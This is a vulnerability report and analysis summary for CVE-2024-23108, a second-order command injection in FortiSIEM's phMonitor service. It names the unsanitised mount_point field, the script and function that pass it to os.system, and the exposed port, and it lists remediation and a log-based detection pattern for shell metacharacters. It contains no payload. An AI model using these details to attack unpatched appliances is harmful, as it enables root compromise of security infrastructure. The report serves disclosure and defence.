Full Report
CVE-2023-34992 was for FortiSIEM command injection vulnerability. The phMonitor takes in a server_ip variable. This was being used to execute a python script via os.system that led to a command injection. The vulnerability was fixed by just validating the IP address being passed in, solving the immediate issue. Within the same request as the original command injection, there is another field called mount_point. This field is saved then used in another script when testing the mount. With this, we have a second order command injection that we first make a request to save the data then another request to execute the exploit from the saved data. I enjoyed this aspect of the exploit, as second order bugs are commonly forgotten about. Overall, good bug report :)
Analysis Summary
# Vulnerability: FortiSIEM 2nd Order Command Injection
## CVE Details
- **CVE ID:** CVE-2024-23108 (and related CVE-2024-23109)
- **CVSS Score:** 10.0 (Critical)
- **CWE:** CWE-78 (Improper Neutralization of Special Elements used in an OS Command)
## Affected Systems
- **Products:** Fortinet FortiSIEM
- **Versions:** Affected prior to version 7.1.2 build 0160.
- **Configurations:** Systems running the `phMonitor` service (typically listening on TCP/7900).
## Vulnerability Description
This is a second-order command injection vulnerability that arose from an incomplete patch for CVE-2023-34992.
The `phMonitor` service processes `handleStorageRequest` messages. While the previous patch added validation for the `server_ip` variable, it failed to sanitize the `mount_point` field. When an attacker sends a crafted request, the `mount_point` value is passed to a downstream script (`/opt/phoenix/deployment/jumpbox/datastore/nfs/test.py`). This script uses the `__testMount()` function to format a string that is executed via `os.system()`. Because the `mount_point` is used directly in this shell command, an attacker can inject arbitrary shell commands.
## Exploitation
- **Status:** PoC available (published by Horizon3.ai on GitHub).
- **Complexity:** Low
- **Attack Vector:** Network (Remote, unauthenticated)
## Impact
- **Confidentiality:** High (Total compromise of the SIEM data)
- **Integrity:** High (Ability to modify logs and system configurations)
- **Availability:** High (Ability to shut down or wipe the SIEM appliance)
- **Note:** Execution occurs with **root** privileges.
## Remediation
### Patches
- **FortiSIEM Version 7.1.2 build 0160** or later.
- Note: Users should also ensure they are on updated versions of 6.4.x, 6.5.x, 6.6.x, 7.0.x as per vendor lifecycle advisories.
### Workarounds
- Restrict access to the `phMonitor` service port (TCP/7900) to only trusted internal assets.
- Implement strict firewall rules to prevent unauthenticated network access to the management interface of FortiSIEM appliances.
## Detection
- **Indicators of Compromise:** Inspect `/opt/phoenix/logs/phoenix.log` for entries associated with `datastore.py nfs test`.
- **Log Pattern:** Look for shell metacharacters (e.g., `;`, `&`, `|`, `` ` ``) or suspicious strings within the arguments of the `datastore.py` command logged in the system logs.
- **Tools:** Horizon3.ai’s NodeZero platform can be used to scan for and verify this vulnerability.
## References
- **Vendor Advisory:** [https://fortiguard.fortinet.com/psirt/FG-IR-23-130](https://fortiguard.fortinet.com/psirt/FG-IR-23-130)
- **Technical Analysis:** [https://horizon3.ai/attack-research/disclosures/cve-2024-23108-fortinet-fortisiem-2nd-order-command-injection-deep-dive/](https://horizon3.ai/attack-research/disclosures/cve-2024-23108-fortinet-fortisiem-2nd-order-command-injection-deep-dive/)
- **PoC Repository:** [https://github.com/horizon3ai/CVE-2024-23108](https://github.com/horizon3ai/CVE-2024-23108)